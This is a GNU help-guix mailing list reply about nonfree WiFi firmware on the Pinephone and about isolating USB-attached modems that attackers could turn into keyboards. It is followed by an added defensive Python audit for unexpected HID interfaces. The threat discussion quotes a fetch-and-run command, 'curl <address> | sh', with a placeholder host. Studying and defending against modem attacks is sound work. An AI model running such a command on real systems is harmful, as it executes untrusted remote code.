unofficial mirror of help-guix@gnu.org 
From: Denis 'GNUtoo' Carikli <GNUtoo@cyberdimension.org>
To: Vagrant Cascadian <vagrant@debian.org>
Cc: help-guix@gnu.org
Subject: Re: Guix on the MNT Reform
Date: Thu, 9 Sep 2021 16:10:46 +0200
Message-ID: <20210909161046.7f1b13ca@primarylaptop.localdomain>
In-Reply-To: <87czpjqak9.fsf@yucca>

On Wed, 08 Sep 2021 09:47:02 -0700
Vagrant Cascadian <vagrant@debian.org> wrote:

> On 2021-09-08, Christine Lemmer-Webber wrote:
> > Denis 'GNUtoo' Carikli <GNUtoo@cyberdimension.org> writes:
> >> Here this i.MX8 issue also affects the Librem5 for instance, and
> >> probably several other devices as well. And the neat thing about
> >> the Librem 5 is that, as I understand it, the modem and the
> >> WiFi cards are removable.
> >
> > I am guessing the Pinephone has a similar issue (or more) though
> > I'm not sure.
> 
> The Pinephone doesn't have that specific issue, as it's a different
> CPU (Allwinner A64), the same used on the pine64+ and pinebook, which
> are supported in Guix's u-boot. I vaguely recall those boards having
> similar types of issues early on requiring some binary blobs, but it
> was fixed in u-boot upstream with a free implementation!

WiFi:
-----
For any FSDG compliant distribution, the issue with the Pinephone will
be the WiFi: the WiFi driver requires a nonfree firmware.

There might be a way around that though: There are various Realtek
drivers that are released as GPL with the binary firmware as hex arrays
inside the drivers, in files with GPL headers.

And I even managed to find someone at an event (CCC Camp) that did a
little bit of reverse engineering on one of such binary firmwares.

Since we have GPL headers, we should be legally safe here and almost
everything should be permitted, including decompilation, automatic
reconstruction of corresponding source code, etc.

However the firmware architecture (8051) is less well supported by some
of the tools like retdec for instance, but we still have tools
like radare2, or sdcc that support it. And we even probably have several
emulators for that architecture as well.

Modem:
------
There is also another issue that affects several smartphones like the
Librem5, the GTA04 (if I recall well), and the Pinephone, but it's not
directly related to FSDG distributions: the modem is connected through
USB. It also affects some laptops with (potentially builtin) USB modems.

While it's an order of magnitude better than most phones that have shared
memory[2], we still need to protect against the modem being potentially
malicious.

To do that we might need to enable usbguard or similar things and
disable usb in u-boot for instance, to be sure that the modem can't
become a keyboard.

On some devices it might be really easy for an attacker to make the
modem become a keyboard as in some cases the modem is really a
smartphone on a chip[3], and so it has some mix of Android and GNU/Linux
running in one of its processors (and probably nonfree modem firmwares /
OS running on the other processors).

So on the GNU/Linux side of the modem you can probably reconfigure the
USB peripheral to also be a keyboard. And it might not be that hard for
attackers to find vulnerabilities in the modem cellular stack and
escalate to the GNU/Linux part of the modem[4].

Once there, the attacker wouldn't be able to reconfigure the modem as a
keyboard and run commands with 'Alt+F2 + curl <address> | sh' if
usbguard blocks the USB reconfiguration of the modem.

And while that kind of risk might not affect everybody, I think it
would still be a good idea to address them as sometimes compromise of
smartphones can lead to people being killed by repressive political
regimes[5]. And it would be a bad thing if these people wouldn't be able
to use free software because of security reasons.

And here GNU/Linux has probably way more potential to achieve that than
Android in the long run due to its architecture and code quality.

References:
-----------
[1] https://libreplanet.org/wiki/Group:Hardware/research/WiFi/Realtek
[2] https://redmine.replicant.us/projects/replicant/wiki/ModemIsolationResearch
[3] https://osmocom.org/projects/quectel-modems/wiki/Pine64_Pinephone
[4] https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20video%20and%20slides/DEF%20CON%2027%20Conference%20-%20Xiling%20Gong%20-%20Exploiting%20Qualcomm%20WLAN%20and%20Modem%20Over%20The%20Air.mp4
[5] Typically smartphones and computers of dissidents living abroad are
    targeted in order to find out who they work with in the repressive
    country in order to kill / torture / imprison these people.

Denis.
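
Added example (not part of the original message, and not usbguard's own code): a small audit of the kind of policy discussed above, walking a sysfs USB tree and flagging a modem that exposes an interface class outside its expected set, such as HID (class 03). The sysfs attribute names are the kernel's; the USB ID 1234:5678, the allowed class set and the sample trees are constructed assumptions.

```python
"""Audit USB devices in a sysfs tree: flag a modem that exposes interface
classes outside its expected set (e.g. HID, class 03 = keyboard/mouse)."""
import tempfile
from pathlib import Path

# Assumed policy (constructed): the vendor:product ID is a placeholder, and
# the expected interfaces are vendor-specific (ff) and CDC (02, 0a).
POLICY = {"1234:5678": {"ff", "02", "0a"}}

def _attr(path):
    try:
        return path.read_text().strip().lower()
    except OSError:
        return None

def audit(sysfs_usb, policy=POLICY):
    """Return sorted (device, usb_id, unexpected_class) findings."""
    findings = []
    root = Path(sysfs_usb)
    for dev in root.iterdir():
        if ":" in dev.name:              # interface dirs look like '1-1:1.0'
            continue
        vid, pid = _attr(dev / "idVendor"), _attr(dev / "idProduct")
        if vid is None or pid is None:
            continue
        usb_id = f"{vid}:{pid}"
        if usb_id not in policy:
            continue
        for intf in root.glob(dev.name + ":*"):
            cls = _attr(intf / "bInterfaceClass")
            if cls is not None and cls not in policy[usb_id]:
                findings.append((dev.name, usb_id, cls))
    return sorted(findings)

def make_tree(root, interface_classes):
    """Build a constructed sysfs-like tree for one modem at bus path 1-1."""
    dev = Path(root) / "1-1"
    dev.mkdir(parents=True)
    (dev / "idVendor").write_text("1234\n")
    (dev / "idProduct").write_text("5678\n")
    for n, cls in enumerate(interface_classes):
        intf = Path(root) / f"1-1:1.{n}"
        intf.mkdir()
        (intf / "bInterfaceClass").write_text(cls + "\n")

def demo():
    with tempfile.TemporaryDirectory() as ok, tempfile.TemporaryDirectory() as bad:
        make_tree(ok, ["ff", "ff", "02", "0a"])          # expected modem layout
        make_tree(bad, ["ff", "ff", "02", "0a", "03"])   # same modem, now also HID
        return audit(ok), audit(bad)
```

On a real system the same audit() can be pointed at /sys/bus/usb/devices; it only reports after the fact, whereas a usbguard rule refuses the device before a driver binds to it.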
